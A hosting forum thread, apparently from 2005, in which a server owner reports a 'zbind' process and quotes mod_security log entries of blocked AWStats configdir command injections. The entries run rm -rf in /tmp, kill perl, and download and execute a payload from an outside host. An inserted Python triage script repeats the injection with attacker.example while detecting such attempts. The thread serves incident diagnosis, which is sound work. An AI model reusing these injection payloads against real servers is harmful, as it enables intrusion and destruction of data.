awstats zbind exploit / urgent!!! critical

IPSecureNetwork

May 28, 2005
I was surprised when today I looked at the processes on the server: I found a process called zbind, and when I investigated I found
the zbind exploit. This exploit affects awstats. Please update the program or tell me what I can do to update my awstats and fix this. Thanks, it is URGENT.
 

chirpy

Jun 15, 2002
Can you be a little clearer on this. That exploit is very common and can be installed by a whole variety of means (usually a phpBB or phpNuke installation). What was the file ownership of the exploit file(s)? If it was nobody:nobody and you are running with SUEXEC enabled, then it's not likely to have been an awstats.pl compromise as perl scripts will be running under the username and group of the account. It's more likely that you haven't upgraded all your phpBB installations to v2.0.16.
 

IPSecureNetwork

May 28, 2005
More about the problem with awstats

mod_security can stop some of the attackers, but one of the codes
could get past the mod_security control.

Look:

211.51.139.133 2005-06-27 20:25:11 (null) /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.pulameasuxtefute.com/sess_3539283e27d73cae29fe2b80f9293f59;perl%20sess_3539283e27d73cae29fe2b80f9293f59;echo%20;echo| HTTP/1.1 200.123.181.115 Access denied with code 406. Pattern match "wget " at THE_REQUEST. 406
211.51.139.133 2005-06-27 20:25:11 (null) /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.pulameasuxtefute.com/sess_3539283e27d73cae29fe2b80f9293f59;perl%20sess_3539283e27d73cae29fe2b80f9293f59;echo%20;echo| HTTP/1.1 200.123.181.114 Access denied with code 406. Pattern match "wget " at THE_REQUEST. 406
Access denied with code 406. Pattern match "/~nobody" at THE_REQUEST

That is some of the code used by the attackers.
But I don't know if awstats has a new bug. I think that is the problem: a new bug in the code execution in awstats.pl.

I post here the mail sent by the server to me:

Note: If this is the first time you recieved this mail, it contains the history for the entire month so far.

Below are the recently upload scripts that contain code to send email. You may wish to inspect them to ensure they are not sending out SPAM.

/home/demo/public_html/lndex.php:128: ";
/home/demo/public_html/lndex.php:129: mail($adminEmail,"PHP Shell Warning - Unauthorized Access",$warnMsg,
/home/demo/public_html/lndex.php:130: "From: $fromEmail\nX-Mailer:$THEVersion AutoWarn System"

After this I deleted the demo account, and I found the zbind process and killed it.
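Added example (not code from the thread, cPanel or AWStats): a Python triage script that reads lines in the layout of the mod_security entries quoted above, flags awstats.pl requests whose configdir value carries shell metacharacters, and separates the attempts mod_security rejected (406) from those that reached awstats.pl, which are the entries that could show a real compromise. The log lines, IPs and host name in the sample are constructed.

```python
import re
from urllib.parse import unquote, urlsplit

# Layout of the mod_security entries quoted in the post:
# client_ip date time (null) request HTTP/x.y server_ip [mod_security message] status
LINE_RE = re.compile(
    r"^(?P<client>\S+) (?P<ts>\S+ \S+) \(null\) (?P<req>\S+) HTTP/\d\.\d "
    r"(?P<server>\S+)(?: (?P<msg>.*?))? (?P<status>\d{3})$"
)

# Constructed sample log (documentation-range IPs, made-up host). Line 1: a blocked request like the
# one in the post; line 2: the same injection without "wget", so that rule would not fire; line 3: normal use.
SAMPLE_LOG = """\
203.0.113.5 2005-06-27 20:25:11 (null) /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;wget%20attacker.example/sess_x;perl%20sess_x;echo| HTTP/1.1 198.51.100.7 Access denied with code 406. Pattern match "wget " at THE_REQUEST. 406
203.0.113.5 2005-06-27 20:26:40 (null) /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;perl%20sess_x;echo| HTTP/1.1 198.51.100.7 200
198.51.100.20 2005-06-27 20:30:02 (null) /awstats/awstats.pl?config=demo&output=main HTTP/1.1 198.51.100.7 200
"""

def parse_query(query):
    # Split on '&' only: the injected payload itself contains ';', which some parsers treat as a separator.
    pairs = [pair.partition("=") for pair in query.split("&") if pair]
    return {unquote(k): unquote(v) for k, _, v in pairs}

def is_configdir_injection(params):
    # awstats.pl handed configdir to a Perl two-argument open(), so a value wrapped in '|' runs
    # as a command. A legitimate value is a plain directory path with none of these characters.
    value = params.get("configdir")
    return value is not None and any(c in value for c in "|;`$")

def triage(log_text):
    # Every awstats.pl configdir injection attempt, with whether mod_security blocked it (406).
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        rec = m.groupdict()
        url = urlsplit(rec["req"])
        params = parse_query(url.query)
        if not url.path.endswith("/awstats.pl") or not is_configdir_injection(params):
            continue
        findings.append({"client": rec["client"], "ts": rec["ts"], "rule": rec["msg"],
                         "blocked": rec["status"] == "406", "payload": params["configdir"]})
    return findings

def unblocked(findings):
    # Attempts that were not rejected: the only entries that can show a real compromise.
    return [f for f in findings if not f["blocked"]]
```

Run `triage()` over the real mod_security log and look at `unblocked()` first; 406 entries alone, as the reply below notes, prove only that an attempt was made.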
 

chirpy

Jun 15, 2002
But those were unsuccessful attempts at running awstats.pl and provide no proof at all that it could have been through awstats.pl that they gained access. Did you see my comments about the file ownerships? You need to post the entries that actually show the successful compromise before you can start blaming awstats.pl.